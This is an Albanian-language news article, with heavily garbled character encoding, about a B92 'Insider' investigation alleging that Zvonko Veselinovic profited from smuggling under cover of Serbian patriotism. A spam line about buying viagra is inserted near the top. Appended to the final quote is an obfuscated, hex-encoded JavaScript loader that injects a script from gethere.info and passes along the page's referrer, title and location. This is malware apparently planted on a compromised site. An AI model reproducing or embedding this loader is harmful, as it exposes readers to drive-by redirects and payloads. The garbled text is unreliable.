zvonko-veselinovic

Patriotizmi serb si mjet pA�r krim

best place buy viagra online. Shumica e popullsisA� serbe nA� KosovA� mezi mbijeton, ndA�rsa disa individA� prej tyre, fal vendimeve tA� shtetit tA� SerbisA� ia dain tA� pasurohen, ndaj ju pengojnA� kontrollet unike tA� kufirit mes KosovA� dhe SerbisA�.

NA� emisionin a�?Insidera�? tA� B92, u tha se patriotizmi serb A�shtA� justifikim pA�r abuzime.

a�?NA� kohA�n e luftA�rave nA� ish-Jugosllavi, tA� sanksioneve dhe inflacionit tA� pA�rditshA�m, pA�r patriotA� u shpallA�n Zeljko Raznatovic Arkan dhe Milorad Ulemek Legija, e sot Zvonko Veselinovici dhe ekipi i tija�?.

Sipas “Insider “, parimi A�shtA� gjithmonA� i njA�jtA�: sa mA� shumA� thirren nA� patriotizA�m dhe nA� serbianizA�m, aq mA� shumA� keqpA�rdoret situata dhe mundA�sia pA�r vjedhje, derisa ai qA� gjykon pA�r kA�to keqpA�rdorime shpallet tradhtar i popullit serb.

Veselinovici, sipas hetimeve tA� ekipit tA� emisionit, brenda disa viteve, nga malli qA� ka hyrA� nga Serbia nA� KosovA�, i liruar nga TVSH-ja, ka bA�rA� njA� perandori biznesi, ndA�rsa pA�r shumicA�n nA� veri tA� KosovA�s dhe nA� Serbi A�shtA� patriot qA� mbron interesat e serbA�ve dhe tA� SerbisA�.

Si shembull pA�rmenden barrikadat tA� cilat vitin e kaluar janA� mbA�shtetur nga pA�rfaqA�suesit e qeverisA� sA� atA�hershme serbe.

Ish-deputeti i PartisA� PA�rparimtare tA� SerbisA�, Borislav Pelevic, thotA� se Veselinovici ishte i pranishA�m gjatA� djegies sA� punktit kufitar nA� JarinA�, sA� bashku me ish ministrin pA�r KosovA�n nA� QeverinA� e SerbisA�, Goran Bogdanovic, si dhe me shefin e ekipit serb pA�r bisedime me PrishtinA�n, Borislav Stefanovic.

Ky i fundit pohon se nuk e njeh Veselinovicin.

a�?AskA�nd nuk e kam parA�, as nuk e njoh atA� njeri. NA�se mA� pyetni a kishim bashkA�punim, njohje, komunikim, pA�rgjigja A�shtA� jo. E kA�tA� e them me pA�rgjegjA�si jo vetA�m pA�r mua, por edhe pA�r ministrin Bogdanovica�?, tha Stefanovic.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}